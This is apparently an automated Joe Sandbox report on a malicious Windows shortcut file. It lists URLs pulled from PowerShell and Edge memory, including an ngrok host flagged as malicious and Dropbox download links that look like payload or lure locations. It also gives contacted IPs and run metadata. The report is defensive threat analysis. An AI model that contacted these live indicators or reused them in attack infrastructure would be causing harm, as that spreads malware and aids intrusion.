                                                                                                                                                                https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://dl-web.dropbox.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://app.hellofax.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://cfl.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVYpowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.dropbox.com/service_worker.jspowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://paper.dropbox.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.hellofax.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://pal-test.adyen.compowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://www.microsoft.coSpowershell.exe, 00000010.00000002.2195811117.00000233539C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.apppowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://permanently-removed.invalid/o/oauth2/revokemsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.hellosign.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.dropbox.com/page_success/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://go.microspowershell.exe, 00000002.00000002.2023468036.0000012D1A942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.dropbox.com/pithos/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjdpowershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2195811117.00000233539C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://sales.dropboxbusiness.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4npowershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://msn.com/msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://photos.dropbox.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com/cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzpowershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          162.125.65.15
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                          162.125.69.18
                                                                                                                                                                                                          		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                          162.125.69.15
                                                                                                                                                                                                          		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                          162.159.61.3
                                                                                                                                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          18.192.31.165
                                                                                                                                                                                                          		7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          142.250.181.65
                                                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          204.79.197.237
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                          		unknownunknownfalse
                                                                                                                                                                                                          162.213.210.250
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		53755IOFLOODUStrue

                                                                                                                                                                                                          Private

                                                                                                                                                                                                          IP
                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                          192.168.2.23
                                                                                                                                                                                                          192.168.2.14
                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                          Analysis ID:1572663
                                                                                                                                                                                                          Start date and time:2024-12-10 18:40:10 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 11m 23s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:39
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:751ietQPnX.lnk
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f.lnk
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.evad.winLNK@90/359@21/14
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 33.3%
                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .lnk

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 192.229.221.95, 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.19.238, 13.107.6.158, 2.16.158.72, 2.16.158.83, 2.16.158.75, 2.16.158.80, 2.16.158.81, 2.16.158.82, 2.16.158.90, 2.16.158.59, 2.16.158.74, 104.110.240.232, 104.110.240.201, 199.232.214.172, 172.165.61.93, 23.218.208.109, 104.110.240.224, 104.110.240.219, 13.87.96.169, 20.189.173.20, 2.16.158.97, 2.16.158.96, 2.16.158.176, 2.16.158.91, 2.16.158.170, 2.16.158.169, 142.251.40.99, 142.250.65.195, 142.251.40.227, 52.149.20.212, 20.190.151.9, 13.107.246.63, 13.107.246.40, 4.152.133.8, 4.150.155.223, 142.250.176.202, 40.126.53.13, 23.44.133.31
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, telem-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, fs
                                                                                                                                                                                                          • Execution Graph export aborted for target 854113748.exe, PID 416 because there are no executed function
                                                                                                                                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 8100 because there are no executed function
                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7148 because it is empty
                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 8592 because it is empty
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: 751ietQPnX.lnk

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          12:41:15API Interceptor199x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                          12:41:27API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                          12:42:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                          17:41:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
